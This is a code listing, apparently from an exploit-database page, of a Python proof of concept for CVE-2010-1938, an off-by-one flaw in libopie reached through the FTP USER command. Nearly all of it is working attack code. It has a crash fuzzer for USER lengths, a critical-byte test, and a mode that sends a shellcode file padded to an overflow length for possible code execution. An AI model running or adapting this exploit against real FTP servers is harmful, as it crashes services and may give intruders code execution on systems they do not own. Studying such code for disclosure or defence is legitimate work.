4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Improved PoC for CVE-2010-1938
Author: Nexxus67
"""

import argparse
from contextlib import closing
from dataclasses import dataclass
from itertools import cycle
import socket
import time
from typing import Optional, Tuple

# ----------------------------------------------------------------------
# Default configuration. Only the IP and port can be overridden from the
# command line; the timeout and buffer size are fixed defaults of TargetConfig.
# Placeholder host used when no ``ip`` argument is supplied.
DEFAULT_IP = "your-target-ip"
# Default FTP port.
DEFAULT_PORT = 21
# Socket timeout, in seconds, applied to connect/send/receive.
DEFAULT_TIMEOUT = 5
# Maximum number of bytes requested per recv() call.
RECV_BUFFER = 1024
# ----------------------------------------------------------------------

# (banner, response) pair produced by ExploitClient.send_payload; an element
# is None when it could not be obtained.
PayloadResult = Tuple[Optional[bytes], Optional[bytes]]


@dataclass(frozen=True)
class TargetConfig:
    """Immutable connection settings for the FTP target.

    Instances are frozen, so the settings cannot be changed after creation.
    """

    # Host name or IPv4 address passed to socket.connect().
    ip: str
    # TCP port of the FTP service.
    port: int = DEFAULT_PORT
    # Default socket timeout in seconds.
    timeout: float = DEFAULT_TIMEOUT
    # Maximum number of bytes requested per recv() call.
    buffer_size: int = RECV_BUFFER


def decode_bytes(data: Optional[bytes]) -> str:
    """Return *data* as stripped text, or ``"(no data)"`` when it is empty.

    Bytes that cannot be decoded are dropped instead of raising, so the
    result is always printable.
    """

    if data:
        text = data.decode(errors="ignore")
        return text.strip()
    return "(no data)"


class ExploitClient:
    """Wraps the target configuration and common FTP helper routines."""

    def __init__(self, config: "TargetConfig") -> None:
        """Store the target settings used by every connection."""
        self.config = config

    def _open_socket(self, timeout: Optional[float] = None) -> socket.socket:
        """Return a TCP socket connected to the configured target.

        Args:
            timeout: Socket timeout in seconds; the configured default is
                used when this is None.

        Raises:
            OSError: If the connection cannot be established. The socket is
                closed before the exception propagates.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.settimeout(timeout if timeout is not None else self.config.timeout)
            sock.connect((self.config.ip, self.config.port))
        except BaseException:
            # Do not leak the descriptor when the connection attempt fails.
            sock.close()
            raise
        return sock

    def send_payload(self, payload: bytes) -> "PayloadResult":
        """Send ``USER <payload>`` and return ``(banner, response)``.

        Returns:
            ``(banner, response)`` when both reads succeed.
            ``(banner, None)`` when the payload was sent but reading the
            reply failed (for example a timeout or a reset connection).
            ``(None, None)`` when connecting, reading the banner, or sending
            failed, i.e. the payload was not delivered.
        """

        try:
            with closing(self._open_socket()) as sock:
                banner = sock.recv(self.config.buffer_size)
                sock.sendall(b"USER " + payload + b"\r\n")
                try:
                    response = sock.recv(self.config.buffer_size)
                except OSError as exc:
                    # The payload was delivered; a missing reply must not be
                    # reported as a delivery failure, and the banner that
                    # was already received is kept.
                    print(f"[-] No response after payload: {exc}")
                    return banner, None
                return banner, response
        except OSError as exc:
            print(f"[-] Payload failed: {exc}")
            return None, None

    def is_service_alive(self, timeout: Optional[float] = None) -> bool:
        """Check if the FTP service accepts a connection within the timeout.

        Any OSError raised while connecting is treated as "not alive".
        """

        try:
            with closing(self._open_socket(timeout=timeout)):
                return True
        except OSError:
            return False


def check_crash(client: ExploitClient, timeout: float = 2.0) -> bool:
    """Report whether the target has stopped accepting connections.

    Args:
        client: Client whose target is probed with a fresh connection.
        timeout: Seconds allowed for the probe connection.

    Returns:
        True when the probe connection fails (treated as a likely crash),
        False when the service still accepts connections.
    """

    still_alive = client.is_service_alive(timeout=timeout)
    return not still_alive


def generate_pattern(length: int) -> bytes:
    """Produce a cyclic pattern for manual offset hunting.

    The pattern is built from three-byte groups (uppercase letter, lowercase
    letter, digit): ``Aa0Bb1Cc2...``. Letters advance in lockstep and digits
    wrap every ten groups, so the sequence repeats after 130 groups
    (390 bytes); offsets are only unambiguous below that length.

    Args:
        length: Number of bytes to generate.

    Returns:
        Exactly ``length`` bytes, or ``b""`` when ``length`` is zero or
        negative (the same convention as ``b"A" * length``).
    """

    upper = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    lower = b"abcdefghijklmnopqrstuvwxyz"
    digits = b"0123456789"
    triples = zip(cycle(upper), cycle(lower), cycle(digits))

    pattern = bytearray()
    # The loop never runs for non-positive lengths, so the slice below cannot
    # cut a partially built pattern from the right-hand side.
    while len(pattern) < length:
        pattern.extend(next(triples))
    return bytes(pattern[:length])


def fuzz_length(client: ExploitClient, start: int = 200, end: int = 400, step: int = 1) -> Optional[int]:
    """Try increasing USER lengths until the service stops answering.

    Args:
        client: Client used to deliver each payload and probe the service.
        start: First username length to try.
        end: Last username length to try (inclusive).
        step: Increment between consecutive lengths.

    Returns:
        The first length after which the service no longer accepts
        connections, or None when delivery fails or no length in the range
        triggers that condition.
    """

    print(f"[*] Fuzzing lengths from {start} to {end} (step {step})")
    candidate_sizes = range(start, end + 1, step)
    for username_len in candidate_sizes:
        filler = b"A" * username_len
        print(f"[*] Testing length {username_len}... ", end="", flush=True)

        banner, _response = client.send_payload(filler)
        if banner is None:
            print("[!] Unable to deliver payload. Stopping fuzzing.")
            return None

        crashed = check_crash(client)
        if not crashed:
            print("OK")
            # Pause between attempts before trying the next length.
            time.sleep(0.5)
            continue

        print("CRASH detected!")
        return username_len

    print("[!] No crash detected in the tested range.")
    return None


def test_critical_byte(client: ExploitClient, critical_length: int, byte: bytes = b"\x00") -> bool:
    """Send a USER payload ending in *byte* and report whether the service dies.

    The payload is ``critical_length - 1`` filler bytes followed by *byte*.

    Args:
        client: Client used to deliver the payload and probe the service.
        critical_length: Length reported for the payload.
        byte: Value placed after the filler.

    Returns:
        True when the service no longer accepts connections afterwards,
        False otherwise.
    """

    filler = b"A" * (critical_length - 1)
    payload = filler + byte
    print(f"[*] Testing critical byte: {byte.hex()} (length {critical_length})")

    banner, response = client.send_payload(payload)
    print(f"[+] Banner: {decode_bytes(banner)}")
    if response:
        print(f"[+] USER response: {decode_bytes(response)}")

    crashed = check_crash(client)
    if not crashed:
        print("[-] Service is still alive.")
        return False

    print("[!!!] CRASH detected! The critical byte affects the service.")
    return True


def send_shellcode(client: ExploitClient, shellcode: bytes, payload_length: int) -> None:
    """Send *shellcode* padded with filler to *payload_length* as the USER value.

    Nothing is sent when *payload_length* does not exceed the shellcode size.
    The banner, the USER response, and the result of the follow-up liveness
    probe are printed.
    """

    code_size = len(shellcode)
    if code_size >= payload_length:
        print("[-] Payload length must be larger than the shellcode size.")
        return

    filler = b"A" * (payload_length - code_size)
    banner, response = client.send_payload(shellcode + filler)
    print(f"[+] Banner: {decode_bytes(banner)}")
    print(f"[+] USER response: {decode_bytes(response)}")

    outcome = (
        "[!!!] Service crashed. Possible execution (context dependent)."
        if check_crash(client)
        else "[-] Service is still alive."
    )
    print(outcome)


def _length_ok(length: Optional[int], option: str) -> bool:
    """Print an error and return False when --length is missing or not positive."""
    if length is None:
        print(f"[-] {option} requires --length")
        return False
    if length <= 0:
        print("[-] --length must be a positive integer")
        return False
    return True


def main() -> None:
    """Parse the command line and run the selected mode.

    Modes, checked in this order:
        --fuzz        sweep USER lengths until the service stops answering.
        --byte-test   send a payload of --length bytes ending in the given byte.
        --shellcode   send the contents of a file padded to --length bytes.
        (none)        quick run over a fixed list of lengths.

    Invalid user input (bad hex, unreadable file, missing or non-positive
    --length) is reported with a ``[-]`` message instead of a traceback.
    """
    parser = argparse.ArgumentParser(description="Improved PoC for CVE-2010-1938 (off-by-one in libopie)")
    parser.add_argument("ip", nargs="?", default=DEFAULT_IP, help="FTP server IP")
    parser.add_argument("-p", "--port", type=int, default=DEFAULT_PORT, help="FTP port (default: 21)")
    parser.add_argument("--fuzz", action="store_true", help="Fuzzing mode: find length causing crash")
    parser.add_argument("--byte-test", metavar="BYTE", help="Test a specific byte (e.g., 00, ff) at critical position")
    parser.add_argument("--shellcode", metavar="FILE", help="File containing binary shellcode to send (experimental)")
    parser.add_argument("--length", type=int, help="Payload length for --byte-test or --shellcode")
    args = parser.parse_args()

    client = ExploitClient(TargetConfig(ip=args.ip, port=args.port))

    if args.fuzz:
        print("[*] Fuzzing mode")
        critical_length = fuzz_length(client)
        if critical_length:
            print(f"\n[+] Critical length found: {critical_length}")
    elif args.byte_test:
        if not _length_ok(args.length, "--byte-test"):
            return
        try:
            byte = bytes.fromhex(args.byte_test)
        except ValueError:
            # Malformed hex (e.g. "0x00", "zz") is handled like empty input.
            byte = b""
        if not byte:
            print(f"[-] Invalid hex value for --byte-test: {args.byte_test!r}")
            return
        test_critical_byte(client, args.length, byte)
    elif args.shellcode:
        if not _length_ok(args.length, "--shellcode"):
            return
        try:
            with open(args.shellcode, "rb") as payload_file:
                shellcode = payload_file.read()
        except OSError as exc:
            print(f"[-] Cannot read shellcode file: {exc}")
            return
        send_shellcode(client, shellcode, args.length)
    else:
        print("[*] No specific arguments. Running quick test with typical lengths...")
        lengths = [256, 257, 258, 300, 400]
        for length in lengths:
            payload = b"A" * length
            print(f"\n[*] Testing length {length}")
            banner, response = client.send_payload(payload)
            print(f"[+] Banner: {decode_bytes(banner)}")
            if response:
                print(f"[+] Response: {decode_bytes(response)}")

            # Nothing was exchanged at all: stop rather than report a crash.
            if banner is None and response is None:
                print("[!] Payload delivery failed during demo run. Stopping.")
                break

            if check_crash(client):
                print("[!!!] CRASH detected!")
                break
            print("[-] Server responds normally.")
            time.sleep(1)


if __name__ == "__main__":
    main()